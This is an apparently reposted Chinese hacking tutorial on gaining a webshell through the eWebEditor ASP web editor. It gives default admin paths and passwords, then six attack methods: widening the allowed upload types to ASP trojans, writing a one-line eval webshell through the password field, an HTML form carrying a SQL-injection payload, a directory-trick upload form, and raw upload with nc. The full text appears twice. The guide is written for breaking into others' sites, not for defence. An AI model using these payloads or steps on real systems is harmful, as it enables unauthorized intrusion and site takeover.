脚本入侵 入侵ewebeditor编辑器一些技巧
程序员文章站
2022-03-19 14:04:46
脚本入侵 入侵ewebeditor编辑器一些技巧,使用ewebeditor的朋友可以参考下。... 11-04-24...
ewebeditor编辑器
建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址:/ewebeditor/admin_login.asp
使用默认密码:admin/admin 或 admin/admin888
不行就默认数据库路径 ewebeditor/db/ewebeditor.mdb 或ewebeditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:chouxiaozi 随便写
路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径:写上这个admin/ 或写/ 免的别人把uploadfile/目录删了 我们找不到马
内容路径:空 记得
图片限制:写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马
拿webshell方法第二种方法
登陆后台,点击修改密码---新密码设置为 1":eval request("choxiaozi")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看
拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
首先先看ewebeditor/upload.asp 上传地址存在不
存在的话就把下面的代码保存为
h1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</h1><br><br>
<form action="这里写上传地址?action=save&type=image&style=luoye' union select s_id,s_name,s_dir,s_css,s_uploaddir,s_width,s_height,s_memo,s_issys,s_fileext,s_flashext, [s_imageext]%2b'|cer',s_mediaext,s_filesize,s_flashsize,s_imagesize,s_mediasize,s_stateflag,s_detectfromword,s_initmode,s_baseurl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=fuck>
</form>
改上传地址保存为chouxiaozi.htm文件,打开可以直接上传cer文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
首先先看下ewebeditor/asp/upload.asp 上传地址存在不
存在就
把下面的代码
<form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存为chouxiaozi.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第六种方法
利用ewebeditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt
然后用编译c32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上传 百度搜索相关教程
回头说下有时候进了个网站后台-看到了ewebeditor编辑器 但是找不到ewebeditor目录地址
我们来点鼠标右键-查看源代码,找到仔细找ewebeditor的路径。
建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址:/ewebeditor/admin_login.asp
使用默认密码:admin/admin 或 admin/admin888
不行就默认数据库路径 ewebeditor/db/ewebeditor.mdb 或ewebeditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:chouxiaozi 随便写
路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径:写上这个admin/ 或写/ 免的别人把uploadfile/目录删了 我们找不到马
内容路径:空 记得
图片限制:写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马
拿webshell方法第二种方法
登陆后台,点击修改密码---新密码设置为 1":eval request("choxiaozi")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看
拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
首先先看ewebeditor/upload.asp 上传地址存在不
存在的话就把下面的代码保存为
h1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</h1><br><br>
<form action="这里写上传地址?action=save&type=image&style=luoye' union select s_id,s_name,s_dir,s_css,s_uploaddir,s_width,s_height,s_memo,s_issys,s_fileext,s_flashext, [s_imageext]%2b'|cer',s_mediaext,s_filesize,s_flashsize,s_imagesize,s_mediasize,s_stateflag,s_detectfromword,s_initmode,s_baseurl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=fuck>
</form>
改上传地址保存为chouxiaozi.htm文件,打开可以直接上传cer文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
首先先看下ewebeditor/asp/upload.asp 上传地址存在不
存在就
把下面的代码
<form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存为chouxiaozi.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第六种方法
利用ewebeditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt
然后用编译c32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上传 百度搜索相关教程
回头说下有时候进了个网站后台-看到了ewebeditor编辑器 但是找不到ewebeditor目录地址
我们来点鼠标右键-查看源代码,找到仔细找ewebeditor的路径。
下一篇: 服务器建立超级隐藏账号方法